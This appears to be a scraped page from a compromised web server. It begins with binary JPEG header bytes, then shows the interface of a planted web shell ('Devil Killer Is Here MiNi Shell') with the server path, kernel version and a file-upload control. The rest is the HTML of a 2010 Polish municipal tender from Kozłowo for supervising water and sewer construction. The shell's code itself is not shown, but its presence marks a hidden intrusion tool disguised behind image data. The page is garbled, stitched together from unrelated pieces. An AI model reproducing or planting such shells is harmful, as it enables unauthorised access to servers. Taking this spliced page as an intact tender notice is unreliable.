JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100615/154689-N-2010.html

<p class="kh_header"><b>Kozłowo: Pełnienie kompleksowego nadzoru inwestorskiego przy realizacji inwestycji pn: Budowa sieci wodno-kanalizacyjnej wraz z przyłączami, obsługą geodezyjną i robotami towarzyszącymi na terenie gminy Kozłowo</b><br>
<b>Numer ogłoszenia: 154689 - 2010; data zamieszczenia: 15.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kozłowo , Kozłowo 60A, 13-124 Kozłowo, woj. warmińsko-mazurskie, tel. 089 6267505, faks 089 6267502.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie kompleksowego nadzoru inwestorskiego przy realizacji inwestycji pn: Budowa sieci wodno-kanalizacyjnej wraz z przyłączami, obsługą geodezyjną i robotami towarzyszącymi na terenie gminy Kozłowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Pełnienie kompleksowego nadzoru inwestorskiego przy realizacji inwestycji pn: Budowa sieci wodno-kanalizacyjnej wraz z przyłączami, obsługą geodezyjną i robotami towarzyszącymi na terenie gminy Kozłowo. Zakres prac będących przedmiotem nadzoru inwestorskiego został podzielony na dwa etapy. Pierwszy etap obejmuje:

a)	wykonanie kanalizacji sanitarnej w miejscowości Kozłowo Osiedle Górka.
         Zakres prac obejmuje:
         - budowę sieci kanalizacji sanitarnej grawitacyjnej w obrębie pasa drogowego             nieutwardzonej lokalnej drogi gminnej. Kanalizacja włączona do istniejącej             kanalizacji sanitarnej do komory 179/80/177.12.
         - Przykanaliki obsługiwanych posesji włączone do w/w projektowanej kanalizacji.
         - Sieć kanalizacji ciśnieniowej zabudowań położonych w północnej części osiedla            Górka położonych poza zlewnią kanalizacji grawitacyjnej.

           Ogólna charakterystyka robót

 I. Kanalizacja sanitarna tłoczna
 1. Kanalizacja sanitarna tłoczna z rur PE, PN10
    - rurociąg O63mm, 							L=33,0 m 
    - przepompownie przydomowe z polietylenu O800 systemu Polpit 5
      z jedną pompą MP 3068.170/HT 212                                          - 2,0 kpl
    - wykonanie zasilenia elektrycznego dla przepompowni przydomowych
                                                                                                            - 2,0 kpl

              II. Kanalizacja grawitacyjna
1. Sieć kanalizacji grawitacyjnej z rur PP, klasy SN 8
                - rurociąg O 160 mm, 					            L=17,0m
           - rurociąg O 200 mm, 					            L=851,0 m
        2.Przyłącza kanalizacji grawitacyjnej z rur PP, klasy SN 8
         - rurociąg O 160 mm                                                                 L= 299 m

b)	wykonanie sieci kanalizacji sanitarnej w miejscowości Kownatki
           Zakres prac obejmuje:
         - budowę sieci kanalizacji sanitarnej grawitacyjnej w obrębie działki 16/11 stanowiącej                    pas drogowy drogi lokalnej planowanej dla przyszłej zabudowy po obu stronach pasa,            oraz do zabudowań Kownatki 4 i 4A. Kanalizacja włączona do przepompowni P3            stanowiącej przedmiot opracowania inwestycji kanalizacji sanitarnej Kownatki-           Szkotowo.
          -Sieć kanalizacji ciśnieniowej zabudowań położonych po wschodniej i północnej             stronie wsi Kownatki z przepompownią lokalną P3/1,z włączeniem do w/w kanalizacji            grawitacyjnej.
         -Sieć kanalizacji sanitarnej grawitacyjnej dla budynku Kownatki 9 likwidująca lokalną            przepompownię przy budynku oraz pasie drogi dz. nr 9/9.Sieć włączona do kanalizacji           grawitacyjnej projektowanej w ramach kanalizacji Turowo- Turówko- Kownatki.
         -Sieć kanalizacji sanitarnej ciśnieniowej północno -zachodniej części wsi obejmującą            zabudowę rozproszoną włączoną do w/w kanalizacji sanitarnej.

Ogólna charakterystyka robót:

I. Kanalizacja sanitarna tłoczona
1.Kanalizacja sanitarna tłoczona z rur PE,PN10
-rurociąg O 63mm, 							L=434,0 m
-rurociąg O 75 mm,							L=275,0 m
-rurociąg O 90 mm,							L=340,0 m

2. Przyłącza kanalizacji sanitarnej tłoczonej z rur PE,PN10
-rurociąg O 63 mm,							L=446,0 m
-przepompownie przydomowe z polietylenu O 800 systemu 
Polpit 5 z jedną pompą MP 3068.170/HT 212 				-15,0 kpl.

II. Kanalizacja sanitarna
1.Sieć kanalizacji grawitacyjnej z rur PE, klasy SN8
-rurociąg O 160 mm, 							L=100,0 m
-rurociąg O 200 mm, 							L=450,5 m
      III. Przepompownia ścieków P-3/1
-Przepompownia ścieków P-3/1 z polimerobetonu typu PS-120-N-230-P 
z 2 pompami typu DP.3068. 180. HT 214 z wyposażeniem 
technologicznym i sterowaniem .					-1,0 kpl.

      IV. Wykonanie zasilania elektrycznego 
      1.Wykonanie zasilania elektrycznego dla przepompowni P-3/1 	-1,0 kpl.
      2.Wykonanie zasilania elektrycznego dla przepompowni 
       przydomowych.								-15 kpl.

c)  wykonanie sieci kanalizacji sanitarnej Turowo - Turówko

Zakres prac obejmuje dwa zadania:

 Zadanie pierwsze:

- wykonanie sieci magistrali kanalizacyjnej tłoczonej na odcinku Turówko- Turowo-   Kownatki.
- wykonanie sieci kanalizacji ciśnieniowej zabudowań położonych w obrębie zwartej    zabudowy wsi.
- wykonanie sieci kanalizacji sanitarnej grawitacyjnej.

Ogólna charakterystyka robót

I. Kanalizacja sanitarna tłoczona 
1.Kanalziacja sanitarna tłoczona z rur PE,PN10
-rurociąg O 75 mm, 							L=50,0 m
-rurociąg O 90 mm, 							L=371,0 m
-rurociąg O 110 mm,							L=6816,0 m

2.Przyłącza kanalizacji sanitarnej tłoczonej z rur PE,PN10
-rurociąg O 63 mm,							L=64,0 m
-rurociąg O 90 mm, 							L=88,0 m
-przepompownie przydomowe z polietylenu O 800 systemu Polpit 5
z jedną pompą MP 3068.170/HT 212 					-3,0 kpl.

II. Kanalizacja grawitacyjna
1.Sieć kanalizacji grawitacyjnej z rur PP, klasy SN8
-rurociąg O 160 mm, 							L=145,0 m
-rurociąg O 200 mm, 							L=1643,0 m
2.Przyłącza kanalizacji grawitacyjnej z rur PP, klasy SN8  
-rurociąg O 160 mm,							L=254,0 m
-rurociąg O 200 mm, 							L=11,0 m
-rurociąg z rur żeliwnych kielichowych d=150 mm,			L=17,0 m 

III. Przepompownie ścieków P-4, P-5, P-5/1
-Przepompownie ścieków P-4  z polimerobetonu typu PS-150-N-260-P 
  z 2 pompami typu NP.3102.181.SH 255  z wyposażeniem 
technologicznymi i sterowaniem 					-1,0 kpl.
-Przepompownia ścieków P5  z polimerobetonu typu PS-150-N-310-P
z 2 pompami typu NP.3102.181. SH 255 z wyposażeniem
technologicznym i sterowaniem 						-1,0 kpl.
-Przepompownia ścieków P-5/1 z polimerobetonu typu PS-120-N-230-P 
z 2 pompami typu DP.3068.180. HT 214 z wyposażeniem 
technologicznym i sterowaniem 						-1,0 kpl.
-Zbiornik awaryjny z kręgów żelbetowych O 1800 mm, hc=1,97 m	-2,0 kpl.

IV. Wykonanie zasilenia elektrycznego dla przepompowni P4, P5, P5/1
 i przepompowni przydomowych 					-3 kpl.


Zadanie drugie:

- wykonanie sieci kanalizacji ciśnieniowej zabudowań kolonijnych położonych poza zlewnią    kanalizacji grawitacyjnej.

Ogólna charakterystyka robót

I. Kanalizacja sanitarna tłoczona z rur PE,PN10
   - rurociąg O 63 mm, 							L=846,0 m

II. Przyłącza kanalizacji sanitarnej tłoczonej z rur PE,PN10
    - rurociąg O 63 mm, 							L=536,0 m

    - przepompownie przydomowe z polietylenu O 800 systemu Polpit 5
       z jedną pompą MP 3068.170/HT 212 				
                                                                                                                   - 7,0 kpl.

       III. Wykonanie zasilenia energetycznego dla 7 przepompowni ścieków.


  Etap drugi obejmuje wykonanie :

a)	sieci kanalizacji sanitarnej i wodociągowej w miejscowości Michałki.

Zakres prac obejmuje:

-wykonanie sieci  magistrali kanalizacji tłoczonej na odcinku Michałki-Januszkowo.
- wykonanie sieci wodociągowej magistralnej Januszkowo-Michałki.
- wykonanie sieci kanalizacji grawitacyjnej wsi Michałki.
- wykonanie sieci wodociągowa rozdzielcza dla zabudowań wsi Michałki.

Ogólna charakterystyka robót.

I. Kanalizacja sanitarna ciśnieniowa z rur PE,PN10
   - rurociąg d=90 mm							L=659,0 m

II. Przeciski rurą stalową d=219x8 mm 					L=27,0 m

III. Kanalizacja sanitarna grawitacyjna
1.Kanalizacja sanitarna grawitacyjna z rur PP, SN8
  - rurociąg d=200 mm							L=271,0 m
  - rurociąg d=160mm							L=68,0 m
2. Przyłącza kanalizacji sanitarnej grawitacyjnej z rur PP,SN8
  - rurociąg d=160 mm 							L=197,0 m
3.Przyłącza kanalizacji sanitarnej grawitacyjnej z rur żeliwnych
  - rurociąg d=150 mm 							L=30,0 m
4.Przepompownie ścieków P8						-1 szt.



IV. Sieć wodociągowa
1.Sieć wodociągowa z rur PE,PN10
  - rurociąg d=63 mm 							L=12,0 m
  - rurociąg d=90 mm 							L=123,0 m
  - rurociąg d=110 mm							L=1744,0m
2.Przeciski rurą stalową d=219x8 mm 					L=27,0m
3.Przyłącza z rur PE,PN10
  -  rurociąg d=40mm 							L=217,0m
4.Studnia wodomierzowa o śr.500 mm 					-1 szt.

V. Wykonanie zasilenia energetycznego pompowni P8
  - kabel YKY 5x4 							-40 m

b) sieci wodociągowej w miejscowości Dziurdziewo.

Zakres prac obejmuje:

- wykonanie sieci i przyłączy wodociągowych dla wsi Dziurdziewo od stacji    wodociągowej we wsi Kamionka.

Ogólna charakterystyka robót

I. Sieć wodociągowa z rur PE,PN10
-rurociąg O 50 mm,							L=60,0 m
-rurociąg O 63 mm, 							L=62,0 m
-rurociąg O 75 mm,							L=105,0 m
-rurociąg O 90 mm,							L=148,0 m
-rurociąg O 110 mm,							L=2848,0 m

II. Przyłącza wodociągowe z rur PE,PN10
-rurociąg O 40 mm,							L=709,5 m
-rurociąg O 50 mm,							L=179,0 m

2.Wykonanie przedmiotu zamówienia musi być zgodne z warunkami wskazanymi w     decyzjach o pozwoleniu na budowę  wydanymi przez Starostę Nidzickiego o numerach:

-  nr 106/2009  z dnia 19.06.2009r
-  nr  27/2009   z dnia 13.02.2009r
-  nr 28/2009    z dnia 13.02.2009r
-  nr 29/2009    z dnia 13.02.2009r
-  nr 26/2009    z dnia 13.02.2009r
-  nr 113/2009  z dnia 30.06.2009r


stanowiących załącznik nr 2a, 2b,2c,2d,2e,2f do SIWZ których załącznikami są projekty 

budowlane (załącznik nr 3a,3b,3c,3d,3e do SIWZ), oraz Specyfikacje Techniczne 

(załącznik nr 4a, 4b,4c,4d,4e do SIWZ.)
 

   3. Pełnienie funkcji inspektora nadzoru inwestorskiego obejmuje:

a)Monitorowanie postępu prac.

b)Sprawowanie nadzoru zgodnie z ustawą z dnia 7 lipca 1994 roku Prawo Budowlane - tekst 

    jednolity Dz. U z 2006 r. Nr 156, poz. 1217, z późn zmianami.

c)Współpracę z nadzorem autorskim, wyjaśnianie wątpliwości i zastrzeżeń do projektu, 

  wprowadzanie zmian nie powodujących zwiększenia kosztów i nie mających wpływu na

   zasadnicze rozwiązania konstrukcyjne, technologiczne i nie powodujących
   
    pogorszenia użyteczności obiektu oraz wzywanie nadzoru autorskiego na budowę.

d)Pobyty na budowie inspektora nadzoru (oraz inspektora branżowego) potwierdzone wpisem  

   do dziennika budowy,(nie rzadziej niż 1 raz w tygodniu, a w miarę potrzeb częściej bądź na 

    każde wezwanie  Zamawiającego) w celu monitorowania prawidłowości wykonywania robót    
   zgodnie z  dokumentacją techniczną, specyfikacjami oraz przyjętą technologią.

e)Rozliczanie wykonawcy z realizacji robót, sprawdzanie i akceptowanie faktur, kalkulacji 
  
   szczegółowych, kosztorysów powykonawczych ,faktur, naliczanie kar i odszkodowań oraz 

   wystawienie Zamawiającemu wszelkich dokumentów związanych z realizacją i 

   rozliczeniem inwestycji, wymaganych przez Zamawiającego i instytucje zewnętrzne.

f)opiniowanie wniosków na roboty zamienne 

g)opiniowanie wniosków wykonawcy robót w sprawie zmiany sposobu wykonania robót 

    budowlanych, w tym zmiany materiałów, maszyn i urządzeń, przebiegu tras i technologii 

    oraz przedkładanie Zamawiającemu na piśmie gotowych  opinii i możliwych rozwiązań.

h)Zawiadamianie o odbiorze częściowym i końcowym wszystkich zainteresowanych instytucji 

   oraz  przyszłych właścicieli uzbrojenia.

i)Przygotowanie oraz udział w odbiorach częściowych i  końcowym .

j)W przypadku zgłoszenia przez Użytkownika usterek w okresie gwarancyjnym, Wykonawca 

    jest zobowiązany do nieodpłatnego udziału w przeglądzie oraz nadzór nad prawidłowością 

    usunięcia usterek.

k)Przekazanie Zamawiającemu dokumentów z odbiorów częściowych, prób, atestów na 

    zabudowane materiały i nadzór nad naniesieniem w dokumentacji projektowej przez 
 
    projektanta i kierownika budowy zmian i uzupełnień, wynikłych w trakcie realizacji.

I)Składanie w terminie do 5 dni po upływie każdego miesiąca sprawozdań z realizacji zadania    
    oraz przyczyn ewentualnych odstępstw. 

ł)Prowadzenie i kontrolę rozliczeń budowy oraz przygotowanie dokumentów przekazania na 
     
   majątek trwały (OT) oraz  dokumentów do uzyskania pozwolenia na użytkowanie obiektu    
   
     wraz z jego uzyskaniem ( jeśli będzie wymagane).

3.2 Inspektor nadzoru dokona sprawdzenia i weryfikacji dokumentacji powykonawczej       oraz pomiaru powykonawczego.


3.3.Inspektor nadzoru zapewni stałą wymianę informacji z zamawiającym oraz      koordynację swojej działalności z wymaganiami Zamawiającego.

3.4.Inspektor nadzoru zobowiązuje się do udostępnienia wszelkich informacji związanych        z realizacją inwestycji uprawnionym osobom i instytucjom oraz umożliwienia        dostępu do  terenu budowy dla osób upoważnionych.

3.5 Inspektor nadzoru zobowiązuje się do rozliczenia umowy o roboty budowlane w         przypadku jej wypowiedzenia.

      3.6.Inspektor nadzoru będzie w szczególności decydować o dopuszczeniu materiałów,             prefabrykatów i wszystkich elementów i urządzeń przewidzianych do wbudowania i             wykorzystania przy realizacji robót, zatwierdzeniu receptur i technologii             proponowanych przez wykonawcę robót budowlanych, wstrzymaniu robót             prowadzonych w sposób zagrażający bezpieczeństwu lub niezgodnie z wymaganiami             dokumentacji projektowej, specyfikacji technicznej oraz podpisanej umowy z                        wykonawcą..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do wartości          10 % zamówienia podstawowego  polegających na świadczeniu usług tego samego          rodzaju.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Warunki udziału w postępowaniu

     O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące      warunki:
A.	Spełniają warunki określone w art.22 ust.1 ustawy Prawo zamówień publicznych:

- Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli   przepisy prawa nakładają obowiązek ich posiadania 
- Posiadają wiedzę i doświadczenie do wykonywania zamówienia 
- Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do    wykonania zamówienia
- Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie   zamówienia
  B. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego        na podstawie art. 24 ust. 1 w związku z art. 22 ust.1 pkt. 4 ustawy Prawo        zamówień  publicznych


Ocena spełniania wyżej wymienionych warunków będzie dokonywana z zastosowaniem formuły spełnia /nie spełnia.
W celu potwierdzenia spełniania wyżej wymienionych warunków wykonawcy     obowiązani są dostarczyć wraz z formularzem oferty stanowiącym załącznik nr 1 do     SIWZ następujące dokumenty:

a)	W celu potwierdzenia , że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają taki obowiązek 
 -  oświadczenia z art. 22 ust 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo        zamówień publicznych - załącznik nr 5 do SIWZ ( w przypadku wspólnego      ubiegania się o  udzielenie zamówienia przez dwóch  lub więcej wykonawców do      oferty muszą być  złożone oświadczenia przez  każdego z  nich)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	Zamawiający celem potwierdzenia posiadania niezbędnej wiedzy i doświadczenia 
( w przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny oraz łączne doświadczenie i kwalifikacje) 

         
            - wykaz usług wykonanych w okresie ostatnich trzech lat przed upływem terminu 

              składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie

   usługi w zakresie nadzoru inwestorskiego co najmniej nad jedną inwestycją    polegającą na budowie sieci wodno - kanalizacyjnej wraz z przyłączami o wartości    nie niższej niż 1 000 000,00 zł - załącznik nr 6 do SIWZ oraz załączy dokumenty     potwierdzające ich należyte wykonanie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający celem potwierdzenia, że wykonawca dysponuje odpowiednim              potencjałem technicznym oraz osobami zdolnymi do  wykonania zamówienia
              
             - zamawiający dokona oceny spełniania tego warunku, na podstawie złożonego 

            wykazu  osób,  które będą uczestniczyć w wykonaniu zamówienia, wraz z

               informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia 

               niezbędnych do  wykonania zamówienia  - załącznik nr 7 do SIWZ oraz    

               informacją o podstawie do dysponowania tymi osobami. Wykonawca musi 

              dysponować osobami posiadającymi uprawnienia do pełnienia samodzielnych 

              funkcji technicznych w  budownictwie do kierowania robotami budowlanymi lub 

              odpowiadające im ważne uprawnienia budowlane, które zostały wydane na 

              podstawie wcześniej obowiązujących przepisów w specjalności:

               - w specjalności instalacyjnej w zakresie sieci, instalacji wodociągowych i

                kanalizacyjnych

               - w specjalności instalacyjnej w zakresie instalacji i urządzeń                 

                 elektrycznych i elektroenergetycznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający celem potwierdzenia, że wykonawca dysponuje odpowiednim              potencjałem technicznym oraz osobami zdolnymi do  wykonania zamówienia
              
             - zamawiający dokona oceny spełniania tego warunku, na podstawie złożonego 

            wykazu  osób,  które będą uczestniczyć w wykonaniu zamówienia, wraz z

               informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia 

               niezbędnych do  wykonania zamówienia  - załącznik nr 7 do SIWZ oraz    

               informacją o podstawie do dysponowania tymi osobami. Wykonawca musi 

              dysponować osobami posiadającymi uprawnienia do pełnienia samodzielnych 

              funkcji technicznych w  budownictwie do kierowania robotami budowlanymi lub 

              odpowiadające im ważne uprawnienia budowlane, które zostały wydane na 

              podstawie wcześniej obowiązujących przepisów w specjalności:

               - w specjalności instalacyjnej w zakresie sieci, instalacji wodociągowych i

                kanalizacyjnych

               - w specjalności instalacyjnej w zakresie instalacji i urządzeń                 

                 elektrycznych i elektroenergetycznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający celem potwierdzenia że wykonawca znajduje się w sytuacji        ekonomicznej i finansowej zapewniającej wykonanie zamówienia:

Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego  oświadczenia z art. 22 ust 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo     zamówień publicznych - załącznik nr  5  do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
